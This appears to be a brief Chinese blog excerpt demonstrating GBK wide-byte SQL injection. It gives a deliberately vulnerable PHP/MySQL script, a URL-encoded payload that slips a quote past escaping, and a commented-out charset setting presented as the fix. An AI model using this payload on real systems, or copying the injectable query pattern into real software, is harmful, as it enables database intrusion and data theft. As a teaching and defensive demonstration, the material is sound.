利用GBK双字节编码突破PHP单引号转义限制进行SQL注入:set names gbk导致的sql注入
<?php $conn = mysql_connect('localhost','root','')or die("<font color=red>不能连接数据库!</font>"); $db = mysql_select_db('test',$conn); mysql_query("set names 'gbk'");//如果是这行,就可以注入了 //mysql_query("SET character_set_connection='gbk',character_set_results='gbk',character_set_client=binary");//换成这行,就可以防止注入了 $username = $_GET['username']; $query = "select * from zp where class_id='27' and flag=0 and username='$username' order by id desc limit 1"; echo $query; $result = mysql_query($query); $row = mysql_fetch_array($result); print_r($row); ?>
get变量:?username=test%d5%27%20or%20id=1%23
------------------------------
参考来源:http://hi.baidu.com/cdcxdzj/blog/item/43a514f7017711c3f3d38515.html